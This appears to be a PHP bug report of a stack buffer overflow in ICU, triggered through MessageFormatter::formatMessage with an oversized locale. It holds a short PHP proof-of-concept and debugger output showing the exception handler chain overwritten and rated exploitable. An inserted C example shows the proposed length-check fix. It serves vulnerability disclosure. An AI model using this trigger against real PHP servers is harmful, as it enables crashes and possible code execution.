Description:
------------
A very long locale string causes a stack-based buffer overflow inside libicu (the ICU library PHP's intl extension links against). PHP could mitigate this issue by limiting the length of the locale argument to a valid value before passing it to ICU.
---------------------------------------------------------------------------
Source code:
https://github.com/php/php-src/blob/PHP-7.0.10/ext/intl/msgformat/msgformat_format.c#L98
PHP_FUNCTION( msgfmt_format_message )
{
    zval *args;
    UChar *spattern = NULL;
    int spattern_len = 0;
    char *pattern = NULL;
    size_t pattern_len = 0;
    const char *slocale = NULL;
    size_t slocale_len = 0;
    MessageFormatter_object mf;
    MessageFormatter_object *mfo = &mf;

    /* Parse parameters. */
    if( zend_parse_method_parameters( ZEND_NUM_ARGS(), getThis(), "ssa",
        &slocale, &slocale_len, &pattern, &pattern_len, &args ) == FAILURE )
    {
        intl_error_set( NULL, U_ILLEGAL_ARGUMENT_ERROR,
            "msgfmt_format_message: unable to parse input params", 0 );
        RETURN_FALSE;
    }

    memset(mfo, 0, sizeof(*mfo));
    msgformat_data_init(&mfo->mf_data);

    if(pattern && pattern_len) {
        intl_convert_utf8_to_utf16(&spattern, &spattern_len, pattern, pattern_len, &INTL_DATA_ERROR_CODE(mfo));
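As an added example (not code from php-src or ICU), the C below shows the mitigation the description proposes: bounding the locale length right after parameter parsing, before the (pointer, length) pair is handed to ICU. ULOC_FULLNAME_CAPACITY (157) is a real ICU constant; LOCALE_MAX_LEN, check_locale, open_formatter and check_repeated are assumed names and values chosen for this illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Assumed application-level cap on a locale identifier. ICU sizes its own
 * locale buffers with ULOC_FULLNAME_CAPACITY (157 bytes); rejecting anything
 * longer than a real locale id could ever be keeps the caller well inside
 * that limit regardless of what the library does internally.
 */
#define LOCALE_MAX_LEN 80

enum locale_check {
    LOCALE_OK = 0,
    LOCALE_TOO_LONG = 1,
    LOCALE_EMBEDDED_NUL = 2
};

/* Validate the locale exactly as a "s" zend parameter delivers it:
 * a pointer plus an explicit byte length, not NUL-terminated by contract. */
enum locale_check check_locale(const char *locale, size_t len)
{
    if (locale == NULL || len > LOCALE_MAX_LEN) {
        return LOCALE_TOO_LONG;        /* reject before any copy happens */
    }
    if (memchr(locale, '\0', len) != NULL) {
        return LOCALE_EMBEDDED_NUL;    /* C-string consumers would silently truncate */
    }
    return LOCALE_OK;
}

/*
 * Stand-in for the step that hands the locale to ICU. It copies into a
 * fixed-size stack buffer (the kind of buffer the crash in this report
 * overruns), but only after check_locale() has accepted the input.
 * Returns 0 on success, -1 when the locale was rejected.
 */
int open_formatter(const char *locale, size_t len)
{
    char fullname[LOCALE_MAX_LEN + 1];   /* bounded by the same constant the check enforces */

    if (check_locale(locale, len) != LOCALE_OK) {
        return -1;
    }
    memcpy(fullname, locale, len);       /* len <= LOCALE_MAX_LEN is now guaranteed */
    fullname[len] = '\0';
    /* ... the real code would call umsg_open(pattern, ..., fullname, ...) here */
    return 0;
}

/* Helper for tests: build a constructed n-byte locale of repeated c and check it. */
enum locale_check check_repeated(char c, size_t n)
{
    enum locale_check r;
    char *buf = malloc(n);

    if (buf == NULL) {
        return LOCALE_TOO_LONG;          /* allocation failure counts as a reject */
    }
    memset(buf, c, n);
    r = check_locale(buf, n);
    free(buf);
    return r;
}

int main(void)
{
    /* Constructed inputs: an ordinary locale and an oversized one in the spirit of the PoC. */
    printf("en_US           -> %d\n", open_formatter("en_US", 5));
    printf("4096-byte locale -> %d\n", check_repeated('A', 4096));
    return 0;
}
```

The check runs on the explicit length supplied by the parameter parser rather than on strlen(), so a locale with an embedded NUL is also rejected instead of being silently shortened at the first copy.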
Test script:
---------------
<?php
ini_set('memory_limit', -1);
$v1 = str_repeat("ABCE", 503566756/3);
$v2 = "test";
$v3 = [];
MessageFormatter::formatMessage($v1, $v2, $v3);
// msgfmt_format_message($v1, $v2, $v3);
Expected result:
----------------
no crash
Actual result:
--------------
Microsoft (R) Windows Debugger Version 6.11.0001.404 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.
CommandLine: C:\tools\php7010\php.exe -n -dextension=ext\php_bz2.dll -dextension=ext\php_com_dotnet.dll -dextension=ext\php_curl.dll -dextension=ext\php_enchant.dll -dextension=ext\php_exif.dll -dextension=ext\php_fileinfo.dll -dextension=ext\php_ftp.dll -dextension=ext\php_gd2.dll -dextension=ext\php_gettext.dll -dextension=ext\php_gmp.dll -dextension=ext\php_imap.dll -dextension=ext\php_intl.dll -dextension=ext\php_ldap.dll -dextension=ext\php_mbstring.dll -dextension=ext\php_mysqli.dll -dextension=ext\php_odbc.dll -dextension=ext\php_openssl.dll -dextension=ext\php_pdo_mysql.dll -dextension=ext\php_pdo_odbc.dll -dextension=ext\php_pdo_pgsql.dll -dextension=ext\php_pdo_sqlite.dll -dextension=ext\php_pgsql.dll -dextension=ext\php_phpdbg_webhelper.dll -dextension=ext\php_shmop.dll -dextension=ext\php_soap.dll -dextension=ext\php_sockets.dll -dextension=ext\php_sqlite3.dll -dextension=ext\php_sysvshm.dll -dextension=ext\php_tidy.dll -dextension=ext\php_xmlrpc.dll -dextension=ext\php_xsl.dll -dextension=ext\php_yaml.dll poc.php
...
(e5c.d80): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\tools\php7010\icuuc57.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\tools\php7010\icuuc57.dll -
Processing initial command 'r;!exploitable -v'
icuuc57!icu_57::Locale::Locale+0x27c:
4a85613c 8801 mov byte ptr [ecx],al ds:002b:05360000=00
0:000:x86> r;!exploitable -v
eax=0535e545 ebx=00000000 ecx=05360000 edx=10201a74 esi=0535e59d edi=00000000
eip=4a85613c esp=0535e55c ebp=0535e64c iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
icuuc57!icu_57::Locale::Locale+0x27c:
4a85613c 8801 mov byte ptr [ecx],al ds:002b:05360000=00
!exploitable 1.6.0.0
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x5360000
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Write Access Violation
Exception Hash (Major/Minor): 0xbf0ac847.0x9fec2922
Hash Usage : Stack Trace:
Major+Minor : icuuc57!icu_57::Locale::Locale+0x27c
Major+Minor : Unknown
Major+Minor : Unknown
Major+Minor : Unknown
Major+Minor : Unknown
Minor : Unknown
Minor : Unknown
Minor : Unknown
Minor : Unknown
Minor : Unknown
Minor : Unknown
Minor : Unknown
Minor : Unknown
...
Minor : Unknown
Minor : Unknown
Minor : Unknown
Minor : Unknown
Minor : Unknown
Instruction Address: 0x000000004a85613c
Description: Exception Handler Chain Corrupted
Short Description: ExceptionHandlerCorrupted
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at icuuc57!icu_57::Locale::Locale+0x000000000000027c (Hash=0xbf0ac847.0x9fec2922)
Corruption of the exception handler chain is considered exploitable
0:000:x86> !exchain
000000000535e640: 0000000043424145
Invalid exception stack at 0000000043424145 // Exception handler pointer overwritten with bytes of the repeated 'ABCE' pattern
0:000:x86> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0535e64c 43424145 icuuc57!icu_57::Locale::Locale+0x27c
0535e650 43424145 0x43424145
0535e654 43424145 0x43424145
0535e658 43424145 0x43424145
0535e65c 43424145 0x43424145
0535e660 43424145 0x43424145
0535e664 43424145 0x43424145
0535e668 43424145 0x43424145
0535e66c 43424145 0x43424145
0535e670 43424145 0x43424145
0535e674 43424145 0x43424145
0535e678 43424145 0x43424145
0535e67c 43424145 0x43424145
0535e680 43424145 0x43424145
0535e684 43424145 0x43424145
0535e688 43424145 0x43424145
0535e68c 43424145 0x43424145
0535e690 43424145 0x43424145
0535e694 43424145 0x43424145
0535e698 43424145 0x43424145